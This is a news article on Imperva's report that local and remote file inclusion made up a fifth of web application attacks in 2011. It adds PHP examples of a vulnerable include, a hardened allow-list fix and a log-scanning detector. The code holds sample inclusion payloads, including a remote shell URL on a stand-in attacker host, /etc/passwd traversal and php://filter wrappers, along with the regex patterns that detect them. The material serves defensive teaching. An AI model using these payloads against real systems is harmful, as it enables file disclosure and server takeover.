Despite accounting for a fifth of attacks on applications, awareness of remote and local file inclusion is worryingly low.
According to Imperva, local file inclusion (LFI) and remote file inclusion (RFI) attacks accounted for 21 per cent of all application attacks observed between June and November 2011 across 40 monitored applications. Both techniques make a vulnerable application load and execute a file of the attacker's choosing, which the attacker then uses to steal data or take control of the server.
Speaking to SC Magazine, Imperva senior security strategist Noa Bar-Yosef said that in an RFI attack the attacker effectively uploads malware to the server, so it is a genuine underlying application security threat, and one that is prevalent enough to rank among the top four attack techniques.
"This targets PHP applications, which account for 77 per cent of web sites, so the scope is large. The TimThumb vulnerability was an RFI attack, and so was the attack at the military dating site. This shows that file inclusion attacks are one of the top techniques we've seen," she said.
She also said that RFI attacks are automated, with attackers using botnets to exploit vulnerabilities at scale.
"SQL injection is the number-one technique used to attack applications and steal data, but we're seeing other techniques. An RFI attack could cause a crash, extract data and allow an attacker to take over a server. We saw a rise in the second half of 2011, and what's concerning is that this doesn't appear in the OWASP top ten," Bar-Yosef said.
An LFI attack differs only in where the included file comes from. Instead of fetching it from a remote server, as in RFI, the attacker points the vulnerable include at a file that is already on the target: a system file reached through directory traversal in a file-name parameter, or a file the attacker has previously managed to get onto the server, for example through an upload feature.
A simple way in is a file with a harmless-looking extension, such as .jpg or .txt, that actually contains PHP code. The include call does not care about the extension, so once a vulnerable application includes the file, the interpreter runs whatever is inside it.
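The include pattern behind both attacks is easiest to see in code. The following is an added example, not code from the article, from Imperva or from any of the applications it mentions: the classic PHP "page" include in its vulnerable form, followed by a hardened version that maps a client-supplied key to a fixed allow-list and confirms the resolved path stays inside the template directory. The constant names, the template directory and the probe strings are assumptions made for this illustration.

```php
<?php
// Added example (not from the article or from Imperva): the classic PHP
// "page" include in its vulnerable form, then a hardened version.
// TEMPLATE_DIR, ALLOWED_PAGES and the probe strings are assumptions made
// for this illustration.

// Vulnerable: the raw query parameter reaches include().
//   ?page=http://attacker.example/shell.txt  -> RFI if allow_url_include=On
//   ?page=../../../../etc/passwd              -> LFI via directory traversal
//   ?page=uploads/avatar.jpg                  -> LFI of an uploaded "image"
//                                                that really holds PHP code
function includePageVulnerable(string $page): void
{
    include $page;   // never do this with client-supplied input
}

// Hardened: the client supplies a key, not a path. The key is looked up in
// a fixed allow-list, the resulting path is canonicalised with realpath(),
// and it must still sit inside the template directory before it is included.
const TEMPLATE_DIR  = __DIR__ . '/templates';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function pageKeyAllowed(string $page): bool
{
    // Strict comparison: no type juggling and no partial matches, so no
    // traversal string, URL or wrapper can ever equal one of the literal keys.
    return in_array($page, ALLOWED_PAGES, true);
}

function resolvePage(string $page): ?string
{
    if (!pageKeyAllowed($page)) {
        return null;                               // unknown key: refuse
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    // Defence in depth: even an allow-listed key must resolve to a real file
    // under TEMPLATE_DIR (guards against a symlink planted in templates/).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function includePageSafe(string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        echo "No such page\n";
        return;
    }
    include $path;
}

// Constructed probe strings run through the allow-list check. From the CLI
// this prints the decision for each; resolvePage() additionally needs the
// templates/ directory and the page file to exist before it returns a path.
$probes = [
    'home',
    '../../../../etc/passwd',
    'http://attacker.example/shell.txt',
    'php://filter/convert.base64-encode/resource=index',
    "home\0",
];
foreach ($probes as $p) {
    printf("%-52s allowed=%s\n", addcslashes($p, "\0"),
        pageKeyAllowed($p) ? 'yes' : 'no');
}
```

Two configuration points go with the code change: `allow_url_include` should stay at its default of Off (it has been off by default since PHP 5.2 and is deprecated since 7.4), which removes the remote half of the attack outright, and an uploaded file should be stored under a name the application chose, outside the web root, so that it can never be reached by an include even if an LFI bug remains.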
Asked how this can be blocked or avoided, Bar-Yosef listed the main areas of application security: keep an eye on online discussion about your security; blacklist IP addresses known to be bad; install a web application firewall; consider a vulnerability assessment tool whose findings feed into the firewall; and look to prevent automated attacks.
She said: "Also fix your code as, ultimately, to be secure you have to be secure yourself."
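The web application firewall and the automated-attack items in the list above come down to recognising inclusion probes in request parameters. The following is an added example, not code from the article, from Imperva or from any firewall product: a minimal screen that decodes each query parameter, classifies it as an RFI URL, a PHP stream wrapper, a directory traversal or a null-byte trick, and runs that over a handful of access-log lines. The pattern list and the log lines are constructed for this illustration, and a real rule set is far larger.

```php
<?php
// Added example (not from the article or from Imperva): a minimal screen
// for file-inclusion probes in request parameters, the kind of check a
// web application firewall rule or a front controller performs. The
// pattern list and the access-log lines are constructed for illustration.

// Classify one raw parameter value. Returns null when nothing matches.
function classifyInclusionProbe(string $value): ?string
{
    // Decode twice so double-encoded payloads (%252e%252e%252f) are caught.
    $v = strtolower(rawurldecode(rawurldecode($value)));

    if (preg_match('#^(https?|ftps?)://#', $v)) {
        return 'rfi';          // include pointed at a remote server
    }
    if (preg_match('#^(php|data|expect|phar|zip|glob)://#', $v)) {
        return 'wrapper';      // stream wrapper: source disclosure or code exec
    }
    if (preg_match('#\.\.[/\\\\]|/etc/passwd|/proc/self#', $v)) {
        return 'traversal';    // LFI via directory traversal
    }
    if (strpos($v, "\0") !== false) {
        return 'null-byte';    // old trick for cutting off an appended ".php"
    }
    return null;
}

// Pull the query string out of a combined-format access-log line and
// classify each parameter. Returns [param => kind] for suspicious ones.
function scanAccessLine(string $line): array
{
    $findings = [];
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
        return $findings;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return $findings;      // no query string, or unparsable request line
    }
    foreach (explode('&', $query) as $pair) {
        [$key, $val] = array_pad(explode('=', $pair, 2), 2, '');
        $kind = classifyInclusionProbe($val);
        if ($kind !== null) {
            $findings[$key] = $kind;
        }
    }
    return $findings;
}

// Constructed log lines: one benign request followed by four probes.
$sampleLog = [
    '203.0.113.5 - - [10/Jan/2012:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2012:10:00:02 +0000] "GET /index.php?page=http://198.51.100.7/x.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2012:10:00:03 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2012:10:00:04 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0',
    '203.0.113.5 - - [10/Jan/2012:10:00:05 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2048',
];
foreach ($sampleLog as $line) {
    $hits = scanAccessLine($line);
    echo ($hits ? 'ALERT ' . json_encode($hits) : 'ok   ')
        . '  ' . substr($line, 0, 80) . "\n";
}
```

Screening like this is a stopgap: it buys time against the automated, botnet-driven scanning Bar-Yosef describes, but an attacker who can vary encodings and wrappers will eventually find a form the patterns miss, which is why her closing advice is to fix the code.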
Tal Be'ery, Imperva's senior web researcher, said: "LFI and RFI are popular attack vectors for hackers because they're less known and very powerful when successful. We observed that hacktivists and for-profit hackers utilised these techniques extensively in 2011, and we believe it's time for the security community to devote more attention to the problem."